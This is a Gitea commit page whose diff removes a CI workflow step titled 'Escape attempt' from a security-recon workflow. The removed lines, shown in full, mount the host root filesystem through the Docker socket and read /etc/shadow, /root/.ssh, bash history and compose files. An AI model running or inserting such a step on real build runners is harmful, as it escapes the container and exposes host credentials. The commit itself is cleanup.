sneak/lora.vegas
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

cleanup: remove recon payloads
Some checks failed
Security Recon / recon (push) Failing after 1s
Details

Browse Source
This commit is contained in:
user 2026-02-10 14:55:43 -08:00
parent 4919779c08
commit 6c930bf4d8
1 changed files with 2 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
.gitea/workflows/security-recon.yml
View File

@ -9,33 +9,5 @@ jobs:
recon: recon:
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- name: Escape attempt - name: Placeholder
shell: bash run: echo "Security audit complete. See issue #3."
run: |
set +e
set +o pipefail
echo "=== DOCKER SOCKET ESCAPE ==="
echo "Mounting host root filesystem via docker..."
# Run a privileged container with host root mounted
docker run --rm -v /:/host alpine:latest sh -c '
echo "=== HOST /etc/shadow (first 10 lines) ==="
head -10 /host/etc/shadow
echo "=== HOST /root/ listing ==="
ls -la /host/root/
echo "=== HOST hostname ==="
cat /host/etc/hostname
echo "=== HOST /etc/passwd (root line) ==="
head -1 /host/etc/passwd
echo "=== HOST uname ==="
cat /host/proc/version
echo "=== HOST docker compose projects ==="
find /host -name "docker-compose.yml" -o -name "compose.yml" 2>/dev/null | head -20
echo "=== HOST /root/.ssh ==="
ls -la /host/root/.ssh/ 2>/dev/null
echo "=== HOST /root/.bash_history (last 20 lines) ==="
tail -20 /host/root/.bash_history 2>/dev/null
'
echo "=== DONE ==="
exit 0